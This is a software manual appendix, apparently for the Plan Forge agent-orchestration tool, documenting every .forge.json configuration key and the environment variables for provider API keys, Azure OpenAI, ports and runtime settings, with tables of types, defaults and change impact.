- forge_sync_instructions for always-true rules; forge_sync_memories for learned lessons; when to run what.

This appendix covers tasks. For other navigational layers:
.forge.json Reference
Every settable key in the per-project Plan Forge configuration file: type, default, example, and what changes when the value is touched. The canonical source of truth for this reference is CONFIG_SCHEMA in pforge-mcp/capabilities.mjs; this appendix mirrors that schema in human-readable form.
Use the forge_config MCP tool (or the dashboard Config tab) for schema-validated writes; both perform atomic updates (write to temp, then rename) so partial writes never leave a half-valid file. Hand-editing is fine for small changes; just validate the JSON before saving.
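The write-to-temp-then-rename pattern can be sketched as follows. This is a generic illustration of the technique, not the forge_config implementation; the function name is hypothetical.

```python
import json
import os
import tempfile


def write_config_atomically(path: str, config: dict) -> None:
    """Write JSON to a temp file in the same directory, then rename over the target."""
    directory = os.path.dirname(os.path.abspath(path))
    # Same directory keeps the rename on one filesystem, where it is atomic.
    fd, tmp_path = tempfile.mkstemp(dir=directory, suffix=".tmp")
    try:
        with os.fdopen(fd, "w", encoding="utf-8") as tmp:
            json.dump(config, tmp, indent=2)
            tmp.flush()
            os.fsync(tmp.fileno())  # make sure the bytes are on disk before the swap
        os.replace(tmp_path, path)  # readers see the old file or the new one, never half
    except BaseException:
        if os.path.exists(tmp_path):
            os.remove(tmp_path)
        raise
```

Serialization happens before the rename, so a config that cannot be encoded as JSON fails without touching the existing file.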
The file lives at the repo root as .forge.json. It is read at startup by the orchestrator, the dashboard, and most MCP tools. The schema is intentionally shallow at the top and grouped by subsystem; each top-level key controls one slice of Plan Forge behavior:
| Top-level key | Subsystem it controls | Where it is used |
|---|---|---|
projectName, preset, templateVersion, pipelineVersion | Project identity | OpenBrain memory scoping, preset gating, version checks |
updateSource | Update source mode | pforge update source selection (auto / github-tags / local-sibling) |
meta | Meta-defect routing | forge_meta_bug_file target repository |
agents | Multi-agent adapters | Generates per-agent setup files (Claude / Cursor / Codex) |
modelRouting | Default model selection | Orchestrator slice dispatch, dashboard Cost tab |
forgeMaster | Forge-Master reasoning loop | forge_master_ask, dashboard Forge-Master tab |
maxParallelism, maxRetries, maxRunHistory | Execution limits | Orchestrator DAG scheduling and retention |
quorum | Multi-model consensus | --quorum=... flag, forge_estimate_quorum |
extensions | Installed extensions | pforge ext, Extensions tab |
hooks | LiveGuard lifecycle hooks | PreDeploy, PostSlice, PreAgentHandoff, PostRun |
openclaw | OpenClaw analytics bridge | PreAgentHandoff snapshot push (optional) |
runtime | Inner-loop subsystems | Phase-25 gate synthesis and quorum reviewer |
brain | Memory and federation | OpenBrain federation across local repos |
testbed | Testbed path | forge_testbed_* tools |
The next sections describe each group in detail. Every field row uses the same five columns (Key, Type, Default, Example, Change impact), so the table reads the same way no matter which subsystem you land on.
Four fields tell Plan Forge what kind of project it is looking at. projectName is the most important one: it scopes memory in OpenBrain (so two projects with the same plan name do not collide) and is the default project tag for traces and replay.
| Key | Type | Default | Example | Change impact |
|---|---|---|---|---|
projectName | string | (none) | "plan-forge" | OpenBrain memory namespace; default project tag for replay; affects all memory-related queries. Changing it splits memory between old and new names. |
preset | enum | (none) | "dotnet" | One of dotnet, typescript, python, java, go, swift, azure-iac, custom. Determines which instruction files, agents, and skills are installed by setup. Read by validators and the dashboard. |
templateVersion | string | (none) | "2.56.0" | Records the Plan Forge release that last ran setup here. Compared against the running CLI version so pforge update can detect drift. |
pipelineVersion | string | "2.0" | "2.0" | Pipeline schema version. Rarely changed by users; bumped when the 7-step pipeline contract changes shape. |
updateSource — how pforge update finds the framework
Controls where the pforge update command pulls framework files from. Defaults to auto, which picks the newer of a local sibling clone (if present) and the latest GitHub tag. See Appendix G — Update Source Modes for the full mode-selection story; this entry is the bare schema reference.
| Key | Type | Default | Example | Change impact |
|---|---|---|---|---|
updateSource | enum | "auto" | "github-tags" | One of auto (pick newer of local-sibling and github-tags), github-tags (always GitHub), or local-sibling (always sibling clone). Validated server-side by POST /api/config; invalid values are rejected with HTTP 400. |
meta — meta-defect routing
Where Plan Forge files bugs against itself. When forge_meta_bug_file runs without an explicit target, it reads meta.selfRepairRepo. If the key is missing, it falls back to srnichols/plan-forge.
| Key | Type | Default | Example | Change impact |
|---|---|---|---|---|
meta.selfRepairRepo | string | (fallback: srnichols/plan-forge) | "acme/plan-forge-fork" | Target repository for self-repair issues. Set this if your team maintains a fork or a private mirror. owner/repo form. See self-repair-reporting. |
agents — multi-agent adapters
Which AI agents have native config files generated alongside the GitHub Copilot defaults. See Chapter 13 — Multi-Agent Setup for what each adapter writes.
| Key | Type | Default | Example | Change impact |
|---|---|---|---|---|
| agents | array<enum> | [] | ["claude", "cursor"] | Each entry is one of claude, cursor, codex. Adding an entry causes setup (or setup --agent <name>) to generate that adapter's native file (e.g. CLAUDE.md, .cursorrules). Removing an entry does not delete files; clean those up manually. |
modelRouting — default model selection
Where slices go by default when no plan-level Model: directive is present. default is the catch-all; execute and review override it for those phases. See Advanced Execution — Model Routing for the routing precedence (plan front-matter > flag > execute/review > default).
| Key | Type | Default | Example | Change impact |
|---|---|---|---|---|
modelRouting.default | enum | "auto" | "claude-opus-4.7" | One of auto, claude-opus-4.7, claude-opus-4.6, claude-sonnet-4.6, claude-haiku-4.5, gpt-5.4, gpt-5.2-codex, gpt-5-mini, gemini-3-pro-preview. auto lets the host pick based on availability. |
modelRouting.execute | string | (uses default) | "gpt-5.3-codex" | Model for slice execution. Free-form string so newer models work without a CLI upgrade. |
modelRouting.review | string | (uses default) | "claude-opus-4.7" | Model for the Step 5 review gate. Free-form string. |
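The routing precedence (plan front-matter > flag > execute/review > default) can be sketched as a lookup chain. The function and parameter names are hypothetical; only the ordering and the modelRouting keys come from this reference.

```python
from typing import Optional


def resolve_model(
    phase: str,                       # "execute" or "review"
    routing: dict,                    # the modelRouting object from .forge.json
    plan_model: Optional[str] = None, # Model: directive in the plan, if any
    flag_model: Optional[str] = None, # model passed on the command line, if any
) -> str:
    """Return the first model found, walking the precedence from highest to lowest."""
    if plan_model:
        return plan_model
    if flag_model:
        return flag_model
    phase_model = routing.get(phase)
    if phase_model:
        return phase_model
    # Assumption: fall back to "auto" when modelRouting.default is absent.
    return routing.get("default", "auto")
```

With `{"default": "auto", "execute": "gpt-5.3-codex"}`, an execute slice resolves to `gpt-5.3-codex` unless the plan or a flag names something else.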
forgeMaster — Forge-Master reasoning loop
Configuration for the Forge-Master intent-routing layer. The routerModel is the small, cheap model that classifies intent; reasoningModel is the heavier model that synthesises the answer.
| Key | Type | Default | Example | Change impact |
|---|---|---|---|---|
forgeMaster.reasoningModel | string | (falls back to modelRouting.default) | "gpt-4o-mini" | Model used for multi-step reasoning in forge_master_ask. Affects answer quality and per-call cost. |
forgeMaster.reasoningProvider | string | (auto-detected) | "githubCopilot" | Which provider serves the reasoning model. One of githubCopilot, anthropic, openai, xai. If unset, Plan Forge picks based on available API keys. |
forgeMaster.routerModel | string | "grok-3-mini" | "gpt-4o-mini" | Small classifier model that decides which tools to call. Should be cheap and fast; quality matters less than latency. |
forgeMaster.defaultProvider | string | (auto-detected) | "githubCopilot" | Default provider for both router and reasoning if the per-model provider is not set. |
forgeMaster.observer (v3.8+): Background hub subscriber that batches live Plan Forge events and narrates notable patterns. Mute-by-default: enabled must be explicitly set to true. Control via forge_master_observe MCP tool or pforge master observe CLI. Observer is strictly read-only; it cannot invoke write tools or create PRs.
| Key | Type | Default | Example | Change impact |
|---|---|---|---|---|
forgeMaster.observer.enabled | boolean | false | true | Master switch. Must be true for any observation to occur. forge_master_observe returns an "observer disabled" error when this is false. Set env var PFORGE_FORGE_MASTER_OBSERVE_DISABLE=1 to override to false at process level regardless of this setting. |
forgeMaster.observer.maxUsdPerDay | number | 0.10 | 0.25 | Daily USD budget cap. Once the day's narration spend reaches this cap the observer skips LLM calls and logs a budget-block event. Cap is finite; null or Infinity means no cap (not recommended). |
forgeMaster.observer.maxNarrationsPerHour | number | 6 | 12 | Max narration LLM calls per clock hour. Rate-limits the observer during burst activity. |
forgeMaster.observer.batchWindowMs | number | 60000 | 30000 | Event batch flush interval in milliseconds. Lower = more responsive narrations; higher = fewer LLM calls. |
| forgeMaster.observer.modelTier | string \| null | null | "fast" | Model capability tier for narrations: flagship (quality), mid (balance), fast (cheap, high-volume), or null to inherit ask-mode model. Tier resolves against the existing model registry; no vendor IDs are hardcoded. Valid values are the MODEL_TIERS array in pforge-mcp/enums.mjs. |
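Read together, the observer keys describe a gate that every narration has to pass. A minimal sketch under stated assumptions: the function, its parameters, and the idea that spend and call counts are tracked by the caller are all hypothetical; only the key semantics come from the table.

```python
import math
from typing import Optional


def may_narrate(
    enabled: bool,
    spent_usd_today: float,
    max_usd_per_day: Optional[float],
    narrations_this_hour: int,
    max_narrations_per_hour: int,
    env_disable: bool = False,  # stands in for PFORGE_FORGE_MASTER_OBSERVE_DISABLE=1
) -> bool:
    """Return True only if the master switch, budget cap, and rate limit all allow a call."""
    if env_disable or not enabled:
        return False
    # null or Infinity means "no cap", per the maxUsdPerDay row.
    capped = max_usd_per_day is not None and not math.isinf(max_usd_per_day)
    if capped and spent_usd_today >= max_usd_per_day:
        return False
    return narrations_this_hour < max_narrations_per_hour
```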
forgeMaster.auditor (v3.8+): Configuration for the A4 plan-health-auditor auto-invocation. The auditor is triggered via hooks.postRun.invokeAuditor. Tokens are attributed to a separate forge-master cost entry; the parent run's budget is never charged.
| Key | Type | Default | Example | Change impact |
|---|---|---|---|---|
| forgeMaster.auditor.modelTier | string \| null | null | "flagship" | Model tier for auditor reasoning: flagship, mid, fast, or null to inherit ask-mode model. Use flagship for highest-quality health analysis; use fast for high-frequency auto-invocation. Valid values are the MODEL_TIERS array in pforge-mcp/enums.mjs. |
forgeMaster.auditor.outputPath | string | ".forge/health/latest.md" | ".forge/health/weekly.md" | Path where the auditor writes its health report, relative to project root. |
Three numeric caps the orchestrator enforces during pforge run-plan.
| Key | Type | Default | Example | Change impact |
|---|---|---|---|---|
maxParallelism | number (1–10) | 3 | 5 | Max concurrent [P]-tagged slices. Higher = faster but more contention on shared resources (the file system, the model provider's rate limit, your wallet). |
maxRetries | number (0–5) | 1 | 2 | How many times a slice will retry after a gate failure before being marked failed. 0 means fail-fast; 5 is the cap to prevent runaway loops. |
maxRunHistory | number (≥1) | 50 | 100 | How many .forge/runs/<timestamp>/ directories are retained on disk. The orchestrator auto-prunes the oldest beyond this cap on every run. |
quorum — multi-model consensus
Configuration for quorum mode. Master switch is enabled; with auto: true the orchestrator only quorums slices whose complexity score crosses threshold. See Advanced Execution — Quorum Mode for the scoring rubric and worked examples, and Complexity Scoring Rubric for the seven signals that drive the score. The CLI --quorum= flag accepts values from the QUORUM_MODES array in pforge-mcp/enums.mjs.
| Key | Type | Default | Example | Change impact |
|---|---|---|---|---|
quorum.enabled | boolean | false | true | Master switch. When false, quorum is off regardless of the other keys. |
| quorum.auto | boolean | true | true | When true, gate quorum on slice complexity score. When false, every slice fans out. |
quorum.threshold | number (1–10) | 6 | 5 | Complexity score above which auto-mode fires quorum. Lower = more slices use quorum, higher cost. |
quorum.models | array<string> | ["claude-opus-4.7", "gpt-5.3-codex", "gemini-3.1-pro"] | ["claude-opus-4.7", "gpt-5.2-codex"] | Models that participate in the dry-run fan-out. 2–5 entries is typical; minimum is 1 (degrades to advisory). |
quorum.reviewerModel | string | "claude-opus-4.7" | "gpt-5.4" | Model that synthesises the dry-run responses into a single execution plan. |
quorum.dryRunTimeout | number (ms) | 300000 | 600000 | Per-worker timeout in milliseconds. Increase for very large slices; the default is 5 minutes. |
quorum.strictAvailability | boolean | false | true | When true, fail-fast (exit code 2) if any configured model is unavailable. When false (default), drop unavailable models and continue if at least one remains. |
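The strictAvailability behavior can be sketched as a filter over the configured model list. The exception type and function name are hypothetical, and raising when no model remains in non-strict mode is an assumption; the table only states that the run continues if at least one remains.

```python
class QuorumUnavailable(Exception):
    """Hypothetical error; a caller could map it to the exit code 2 described above."""


def select_quorum_models(
    configured: list[str], available: set[str], strict: bool = False
) -> list[str]:
    """Return the models that will take part in the dry-run fan-out."""
    usable = [model for model in configured if model in available]
    missing = [model for model in configured if model not in available]
    if strict and missing:
        # strictAvailability: true means any gap is fatal.
        raise QuorumUnavailable(f"unavailable models: {missing}")
    if not usable:
        # Assumption: with nothing left there is no quorum to run.
        raise QuorumUnavailable("no configured model is available")
    return usable
```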
extensions — installed extensions
Names of extensions installed via pforge ext add <name>. Managed by the CLI; rarely edited by hand. See Chapter 12 — Extensions.
| Key | Type | Default | Example | Change impact |
|---|---|---|---|---|
extensions | array<string> | (none) | ["notify-slack", "notify-teams"] | Extension names from the catalog. pforge ext add appends; pforge ext remove deletes. Affects which tools and skills are registered at startup. |
hooks — LiveGuard lifecycle hooks
Five hook configurations live under this object: preDeploy (before deploy slices), postSlice (after every slice), preAgentHandoff (multi-agent turn), preCommit (ordered commit-time guard chain), and postRun (after a run completes; auditor auto-invoke). Each section is independent; omit any subsection to accept its defaults.
For the full eight-hook picture, including the Copilot session hooks (SessionStart, PreToolUse, PostToolUse, Stop) configured separately in .github/hooks/plan-forge.json and the PreCommit chain runner, see Customization — Lifecycle Hooks Reference.
hooks.preDeploy
| Key | Type | Default | Example | Change impact |
|---|---|---|---|---|
hooks.preDeploy.enabled | boolean | true | false | Master switch for the PreDeploy hook. Disable only if you have an equivalent external gate. |
hooks.preDeploy.blockOnSecrets | boolean | true | true | When true, block deploy if forge_secret_scan finds anything at severity ≥ high. Set false to demote to a warning. |
hooks.preDeploy.warnOnEnvGaps | boolean | true | true | Warn (do not block) when forge_env_diff finds keys missing from the target environment. |
hooks.preDeploy.scanSince | string (git range) | "HEAD~1" | "HEAD~10" | Git range scanned for secrets. Widen for repos with bursty commit cadence. |
hooks.postSlice
| Key | Type | Default | Example | Change impact |
|---|---|---|---|---|
hooks.postSlice.silentDeltaThreshold | number | 5 | 3 | Drift score delta below this is silent (no log line). |
hooks.postSlice.warnDeltaThreshold | number | 10 | 15 | Drift score delta at or above this prints a warning. Between silent and warn = info. |
| hooks.postSlice.scoreFloor | number | 70 | 80 | Absolute drift score floor; a score below this triggers a red warning regardless of delta. |
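The three postSlice thresholds combine into one severity decision. A sketch under stated assumptions: the function name and level labels are hypothetical, and the delta is treated as the magnitude of change between two scores, which the table does not specify.

```python
def classify_drift(
    previous_score: float,
    current_score: float,
    silent_delta: float = 5,   # hooks.postSlice.silentDeltaThreshold
    warn_delta: float = 10,    # hooks.postSlice.warnDeltaThreshold
    score_floor: float = 70,   # hooks.postSlice.scoreFloor
) -> str:
    """Return 'red', 'warn', 'info', or 'silent' for one slice's drift result."""
    # The floor is checked first because it applies regardless of delta.
    if current_score < score_floor:
        return "red"
    delta = abs(current_score - previous_score)  # assumption: magnitude, not direction
    if delta < silent_delta:
        return "silent"
    if delta >= warn_delta:
        return "warn"
    return "info"
```

With the defaults, a move from 90 to 83 logs at info level, while any score under 70 is flagged red even if it barely moved.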
hooks.preAgentHandoff
| Key | Type | Default | Example | Change impact |
|---|---|---|---|---|
hooks.preAgentHandoff.injectContext | boolean | true | true | Inject LiveGuard context (drift score, MTTR, open incidents) into the next agent's prompt at handoff. |
hooks.preAgentHandoff.runRegressionGuard | boolean | true | true | Run forge_regression_guard at handoff time. Disable if your CI already does this. |
hooks.preAgentHandoff.cacheMaxAgeMinutes | number | 30 | 60 | Max cache age before LiveGuard tools are re-run. Higher = faster handoffs, staler data. |
hooks.preAgentHandoff.minAlertSeverity | string | "medium" | "high" | Minimum severity for an alert to be injected. One of low, medium, high, critical. |
hooks.preCommit.chain[]
Ordered commit-time validation chain executed by .github/hooks/PreCommit.mjs during pforge run-plan. The built-in entries are master-branch-reject first and diff-classify second; the first non-zero exit stops the commit.
| Key | Type | Default | Example | Change impact |
|---|---|---|---|---|
hooks.preCommit.chain | array | [{ name: "master-branch-reject", ... }, { name: "diff-classify", ... }] | [{ "name": "custom-check", "command": "node scripts/check.js" }] | Defines the ordered PreCommit chain. Entries run sequentially; first non-zero exit aborts the commit. |
hooks.preCommit.chain[].name | string | "master-branch-reject" / "diff-classify" | "license-scan" | Stable display name for logs and diagnostics. The first built-in entry is master-branch-reject; the second is diff-classify. |
hooks.preCommit.chain[].command | string | node .github/hooks/PreCommit.mjs <name> | node scripts/license-scan.mjs | Command executed for that chain entry. Use a deterministic command that exits non-zero on block. |
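The chain semantics (run in order, stop at the first non-zero exit) can be sketched with the standard library. This is not the PreCommit.mjs runner; the function name is hypothetical, and splitting each command string with shlex is an assumption about how commands are parsed.

```python
import shlex
import subprocess
from typing import Optional


def run_chain(chain: list[dict]) -> Optional[str]:
    """Run entries in order; return the name of the first blocker, or None if all pass."""
    for entry in chain:
        # Each entry carries the two documented keys: name and command.
        result = subprocess.run(shlex.split(entry["command"]))
        if result.returncode != 0:
            return entry["name"]  # later entries never run
    return None
```

A caller would abort the commit whenever the return value is not None and report the returned name in its diagnostics.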
hooks.postRun.invokeAuditor (v3.8+): Automatically invoke the A4 plan-health-auditor after a run completes. Two trigger modes: fire on every failure (onFailure), or fire periodically after N runs (everyNRuns). Both are off by default. When both conditions fire on the same run, the auditor is invoked exactly once.
| Key | Type | Default | Example | Change impact |
|---|---|---|---|---|
hooks.postRun.invokeAuditor.onFailure | boolean | false | true | When true, automatically invokes the A4 auditor whenever a plan run ends with at least one failed slice. The auditor's tokens are attributed to a separate forge-master cost entry, never to the parent run's budget. |
| hooks.postRun.invokeAuditor.everyNRuns | number \| null | null | 5 | Invoke the auditor after every N completed runs (pass or fail). Counter persists in .forge/auditor-state.json. When the state file is absent the first run always triggers. Set to null to disable. Reasonable values: 5–25. |
The auditor is spawned as its own Forge-Master process so its token costs land in forge_cost_report under the forge-master source. Use forge_testbed_findings to query any defects the auditor surfaces. For the full auditor configuration (model tier, output path), see forgeMaster.auditor.
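The two triggers reduce to a single yes/no decision, which is why the auditor runs at most once per run. A sketch under stated assumptions: the function and its parameters are hypothetical, and treating the persisted counter as a simple run count checked with a modulo is a guess at how "every N runs" is evaluated.

```python
from typing import Optional


def should_invoke_auditor(
    run_failed: bool,                    # at least one slice failed in this run
    completed_runs: int,                 # counter value after this run
    on_failure: bool = False,            # hooks.postRun.invokeAuditor.onFailure
    every_n_runs: Optional[int] = None,  # hooks.postRun.invokeAuditor.everyNRuns
    state_file_present: bool = True,     # whether .forge/auditor-state.json exists
) -> bool:
    """Combine both triggers into one decision so a double hit still invokes once."""
    failure_trigger = on_failure and run_failed
    if every_n_runs is None:
        periodic_trigger = False
    elif not state_file_present:
        periodic_trigger = True  # the first run always triggers when no state exists
    else:
        periodic_trigger = completed_runs % every_n_runs == 0
    return failure_trigger or periodic_trigger
```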
openclaw — OpenClaw analytics bridge (optional)
Optional outbound POST on every PreAgentHandoff. Configures the analytics ingest endpoint. Leave unset to disable.
| Key | Type | Default | Example | Change impact |
|---|---|---|---|---|
openclaw.endpoint | string (URL) | (unset = disabled) | "https://openclaw.example/api/ingest" | Ingest endpoint URL. When set, every PreAgentHandoff posts a context snapshot. |
openclaw.apiKey | string | (fallback: .forge/secrets.json#OPENCLAW_API_KEY) | "sk_live_..." | API key. Prefer storing in .forge/secrets.json (gitignored) rather than in .forge.json (typically committed). |
runtime — inner-loop subsystems
Opt-in subsystems added by Phase-25. Both default to off or advisory; existing users see no behavior change without explicit configuration.
runtime.gateSynthesis
L6: adaptive gate synthesis from Tempering minima. Suggest-only by default; the orchestrator never mutates plans.
| Key | Type | Default | Example | Change impact |
|---|---|---|---|---|
runtime.gateSynthesis.mode | enum | "suggest" | "off" | One of off (silent), suggest (print advisory), enforce (track in .forge/gate-suggestions.jsonl, Phase-26+). Plans are still never mutated. |
runtime.gateSynthesis.domains | array<enum> | ["domain", "integration", "controller"] | ["domain"] | Which Tempering profiles to emit suggestions for. Trim to reduce noise. |
runtime.reviewer
L4: opt-in speed-quorum reviewer that scores slice diffs inside brain.gate-check. Advisory-only by default.
| Key | Type | Default | Example | Change impact |
|---|---|---|---|---|
runtime.reviewer.enabled | boolean | false | true | Master switch. Off by default; turn on to get reviewer verdicts in the dashboard Audit-Loop tile. |
runtime.reviewer.quorumPreset | enum | "speed" | "power" | One of speed (cheaper, faster) or power (flagship models, slower). |
runtime.reviewer.blockOnCritical | boolean | false | false | When true, critical verdicts block the next slice. Advisory-only (false) by design. |
runtime.reviewer.timeoutMs | number (ms) | 30000 | 60000 | Max time to wait for a reviewer response. Increase for power-preset reviewers on large diffs. |
brain — memory and federation
OpenBrain federation configuration. Off by default; opt-in via brain.federation.enabled.
| Key | Type | Default | Example | Change impact |
|---|---|---|---|---|
brain.federation.enabled | boolean | false | true | Master switch for cross-project read-only memory federation (L4-lite, Phase-25). |
brain.federation.repos | array<string> | [] | ["E:/GitHub/Rummag"] | Absolute local repo paths only. Relative paths and URL schemes (http, https, ssh, git) are rejected at load time. Each entry is searched read-only by brain_recall. |
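The load-time rule for brain.federation.repos (absolute local paths only) can be sketched as a validator. The function name is hypothetical, and accepting both Windows-style and POSIX-style absolute paths is an assumption, since the manual's example uses a drive-letter path.

```python
import re
from pathlib import PurePosixPath, PureWindowsPath

# The four URL schemes the table names as rejected.
_URL_SCHEME = re.compile(r"^(https?|ssh|git)://", re.IGNORECASE)


def is_valid_federation_repo(entry: str) -> bool:
    """Accept only absolute local paths; reject URLs and relative paths."""
    if _URL_SCHEME.match(entry):
        return False
    # Pure paths parse the string without touching the filesystem.
    return PureWindowsPath(entry).is_absolute() or PurePosixPath(entry).is_absolute()
```

This checks form only; whether the directory exists or contains a repository is a separate question.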
testbed — testbed path
Where the reference testbed repo lives. Required for the forge_testbed_* tools and the --testbedPath override.
| Key | Type | Default | Example | Change impact |
|---|---|---|---|---|
testbed.path | string (path) | (unset = testbed tools error) | "E:/GitHub/plan-forge-testbed" | Absolute or workspace-relative path to the testbed repo. When unset, forge_testbed_run returns ERR_TESTBED_NOT_FOUND with a recovery hint. |
A realistic .forge.json for a TypeScript project that has opted into Claude as a secondary agent, runs quorum on high-complexity slices, and uses OpenBrain federation to read from a sibling repo:
.forge.json, representative

```json
{
  "projectName": "myapp",
  "preset": "typescript",
  "templateVersion": "2.56.0",
  "updateSource": "auto",
  "agents": ["claude"],
  "modelRouting": {
    "default": "auto",
    "execute": "gpt-5.3-codex",
    "review": "claude-opus-4.7"
  },
  "forgeMaster": {
    "reasoningModel": "gpt-4o-mini",
    "reasoningProvider": "githubCopilot",
    "routerModel": "gpt-4o-mini",
    "defaultProvider": "githubCopilot",
    "observer": {
      "enabled": false,
      "maxUsdPerDay": 0.10,
      "maxNarrationsPerHour": 6,
      "batchWindowMs": 60000,
      "modelTier": null
    },
    "auditor": {
      "modelTier": null,
      "outputPath": ".forge/health/latest.md"
    }
  },
  "maxParallelism": 3,
  "maxRetries": 1,
  "maxRunHistory": 50,
  "quorum": {
    "enabled": true,
    "auto": true,
    "threshold": 6,
    "models": ["claude-opus-4.7", "gpt-5.3-codex", "gemini-3.1-pro"],
    "reviewerModel": "claude-opus-4.7",
    "dryRunTimeout": 300000,
    "strictAvailability": false
  },
  "extensions": ["notify-slack"],
  "hooks": {
    "preDeploy": { "enabled": true, "blockOnSecrets": true, "warnOnEnvGaps": true, "scanSince": "HEAD~1" },
    "postSlice": { "silentDeltaThreshold": 5, "warnDeltaThreshold": 10, "scoreFloor": 70 },
    "preAgentHandoff": { "injectContext": true, "runRegressionGuard": true, "cacheMaxAgeMinutes": 30, "minAlertSeverity": "medium" },
    "postRun": { "invokeAuditor": { "onFailure": true, "everyNRuns": null } }
  },
  "brain": {
    "federation": {
      "enabled": true,
      "repos": ["E:/GitHub/shared-platform-memory"]
    }
  },
  "meta": { "selfRepairRepo": "srnichols/plan-forge" }
}
```
- .forge.json interacts with copilot-instructions.md and instruction files when settings conflict.
- .forge.json: provider API keys, server ports, orchestrator timing, telemetry. Includes the full resolution precedence when flags, env vars, secrets, and .forge.json overlap.
- updateSource: auto | github-tags | local-sibling.
- quorum.* key does in practice; the complexity scoring rubric that drives auto.
- agents generates.
- brain.federation shapes cross-project memory recall.
Every environment variable Plan Forge reads, grouped by subsystem, with type, default, scope, and security note. The companion reference to Appendix T — .forge.json: settings that change per-machine or contain secrets live here; settings that travel with the project live there.
.forge/secrets.json or your shell environment: never in .forge.json. The secrets file is gitignored by default; the env-var fallback works the same way in CI runners and on developer machines. The Provider API Keys table flags every secret with a lock icon.
Plan Forge reads roughly 40 environment variables across nine subsystems. Most have sensible defaults; the only ones you typically set yourself are provider API keys (so the orchestrator can call a model) and server ports (if 3100/3101 conflict with something else on your machine).
| Group | When you touch it |
|---|---|
| Provider API keys | Always. At least one model provider must be configured. |
| Azure OpenAI | Only when routing through Azure OpenAI instead of the model vendor's public API. |
| Server ports and network | Only if the default ports collide or you need to harden the bridge. |
| Project and runtime | Mostly internal (set by tests or by pforge itself). |
| Orchestrator timing | Tuning gate or worker timeouts on slow CI runners. |
| Feature toggles | Enabling experimental subsystems or bypassing checks. |
| Telemetry (OTel) | Sending traces to a collector. |
| Host detection (read-only) | Never. Plan Forge reads these from your IDE to pick the right adapter. |
| CLI internal | Set transiently by pforge itself; documented for transparency only. |
Every field row uses the same six columns (Variable, Type, Default, Scope, Set when, Security), so the table reads the same way no matter which subsystem you land on. Scope is one of per-user (export in your shell profile), per-machine (system env or CI variable), or per-session (transient, set on a single invocation).
The orchestrator needs at least one of these to route a slice through a non-Copilot model. All are read from the environment first, then from .forge/secrets.json as a fallback (see pforge-mcp/secrets.mjs for the loader). The dashboard Config → Secrets tab is the friendliest way to set them: it writes the secrets file atomically and never echoes the value back.
| Variable | Type | Default | Scope | Set when | Security |
|---|---|---|---|---|---|
XAI_API_KEY 🔒 | string | (none) | per-user | You want to route slices through Grok models (grok-4.20, grok-4, grok-3, grok-3-mini). | Secret. Prefer .forge/secrets.json. |
OPENAI_API_KEY 🔒 | string | (none) | per-user | You want GPT models or DALL-E image generation (forge_generate_image). | Secret. Prefer .forge/secrets.json. |
ANTHROPIC_API_KEY 🔒 | string | (none) | per-user | You want Claude models directly (not via GitHub Copilot). | Secret. Prefer .forge/secrets.json. |
OPENCLAW_API_KEY 🔒 | string | (none) | per-user | openclaw.endpoint is set in .forge.json and PreAgentHandoff should authenticate. | Secret. Prefer .forge/secrets.json. |
GITHUB_TOKEN 🔒 | string | (none) | per-user | forge_meta_bug_file, forge_classifier_issue, or forge_github_metrics needs to call the GitHub API. gh auth status is the easier path when the GitHub CLI is installed. | Secret. Use a fine-scoped token; repo + issues is enough. |
OPENBRAIN_KEY 🔒 | string | (none) | per-user | OpenBrain replay needs authenticated access (rare; OpenBrain is local-first). | Secret. Prefer .forge/secrets.json. |
Set this group when your organization routes model calls through Azure OpenAI for billing, residency, or governance reasons. The keys are read by cost-service.mjs for pricing, by the orchestrator for invocation, and by forge_doctor_quorum for quota preflight (when PFORGE_FOUNDRY_QUOTA_PREFLIGHT=1).
| Variable | Type | Default | Scope | Set when | Security |
|---|---|---|---|---|---|
AZURE_OPENAI_ENDPOINT | string (URL) | (none) | per-user | Routing through Azure OpenAI. | Not secret, but reveals tenant name. Example: https://my-resource.openai.azure.com/. |
AZURE_OPENAI_API_KEY 🔒 | string | (none) | per-user | Key-based auth (not Managed Identity). | Secret. Prefer AZURE_AUTH_MODE=managed-identity when possible. |
AZURE_OPENAI_DEPLOYMENT | string | (none) | per-user | You need to override the deployment name parsed from the model spec. | Not secret. |
AZURE_OPENAI_API_VERSION | string | (none) | per-user | You need a specific Azure OpenAI API version (e.g. 2024-02-01). | Not secret. |
AZURE_OPENAI_DEPLOYMENT_TYPE | enum | "global" | per-user | Pricing is regional or data-zone rather than global. Read by cost-service.mjs. | Not secret. |
AZURE_OPENAI_ACCOUNT_NAME | string | (none) | per-user | Foundry quota preflight needs the account name (also accepts AZURE_OPENAI_RESOURCE_NAME as an alias). | Not secret. |
AZURE_SUBSCRIPTION_ID | string (GUID) | (none) | per-user | Foundry quota preflight or any Azure-RM call. | Not secret. |
AZURE_RESOURCE_GROUP | string | (none) | per-user | Foundry quota preflight needs the resource group. | Not secret. |
AZURE_AUTH_MODE | string | (unset) | per-user | Switching between key-based and identity-based auth. Common values: managed-identity, service-principal, cli. | Not secret. |
Set these only if the defaults collide with something else on your machine, or when you need to harden the dashboard bridge with an auth token.
| Variable | Type | Default | Scope | Set when | Security |
|---|---|---|---|---|---|
PLAN_FORGE_HTTP_PORT | number | 3100 | per-machine | Port 3100 is taken by another service. | Not secret. |
PLAN_FORGE_WS_PORT | number | 3101 | per-machine | Port 3101 is taken (the WebSocket hub). | Not secret. |
PFORGE_DASHBOARD_PORT | number | 3100 | per-machine | The CLI needs to open the dashboard on a non-default port (read by pforge open-dashboard). | Not secret. |
PFORGE_DASHBOARD_URL | string (URL) | http://127.0.0.1:3100/dashboard | per-machine | The screenshot capture script needs to point at a remote dashboard. | Not secret. |
PFORGE_BRIDGE_SECRET 🔒 | string | (none) | per-machine | You want to require authentication on the MCP bridge endpoints (recommended on multi-user hosts). | Secret. Use 32+ random bytes. |
PFORGE_AUTH_TOKEN 🔒 | string | (none) | per-machine | You want to require a bearer token on the REST API (see MCP Server Reference — REST API). | Secret. Use 32+ random bytes. |
Mostly read internally. PLAN_FORGE_PROJECT is the only one you might set yourself, and almost always only in tests.
| Variable | Type | Default | Scope | Set when | Security |
|---|---|---|---|---|---|
PLAN_FORGE_PROJECT | string (path) | process.cwd() | per-session | Pointing the orchestrator at a project directory other than the working directory (mostly tests). | Not secret. |
PFORGE_ENV | string | "dev" | per-machine | You want LiveGuard and the run journal to tag runs with an env label other than dev. | Not secret. |
PFORGE_LOG_LEVEL | enum | (unset = info) | per-session | Debugging: set to debug to surface cost-service tracing and other diagnostic logs. | Not secret. |
PFORGE_NO_UPDATE_CHECK | boolean (1/0) | (unset) | per-machine | CI environment where reaching out to GitHub for an update check is unwanted. | Not secret. |
